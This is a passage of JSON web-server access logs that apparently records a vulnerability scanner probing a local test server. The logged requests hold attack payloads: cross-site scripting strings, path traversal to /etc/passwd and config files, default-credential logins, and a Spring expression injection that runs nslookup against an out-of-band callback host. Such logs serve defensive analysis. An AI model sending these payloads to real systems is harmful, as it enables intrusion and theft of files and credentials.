+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //wp-admin/options-general.php/%22%3E%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/script%3E?page=securimage-wp-options%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search/admin/admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/httptrace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/phpMyAdmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/ck/domenu.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mod/lti/auth.php?redirect_uri=javascript:alert('29KAXwCpY32MOwI0IVevw2xZWDt') HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"","request":"GET /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-playground-html HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /browser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/weekender/friend.php?id=MTA0&link=aHR0cHM6Ly9leGFtcGxlLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"127.0.0.1/maint/index.php?packages", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5C/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SSI/Auth/ip_snmp.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bugs/verify.php?confirm_hash=&id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22nslookup%20ca285tosmpvbafqg07h0d66t6ogwox5ki.oast.fun%22%29%7D__::.x/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=my-chatbot&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A 00000001-00000001\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A <_this xsi:type=\x22ManagedObjectReference\x22 type=\x22ServiceInstance\x22>ServiceInstance\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sdk/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mp_idx=%22;alert(%271%27);// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"errorpage=/etc/passwd&obj-action=auth&:action=login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/webproc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bolt/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dfshealth.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install.php?profile=default HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /npm-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer/Pages/ReportViewer.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"login=AEE&last_page=&username=admin&password=admin&submit=Login&JS_SWITCH=JS_ON","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ZMC_Admin_Login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpfastcache/phpfastcache/examples/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 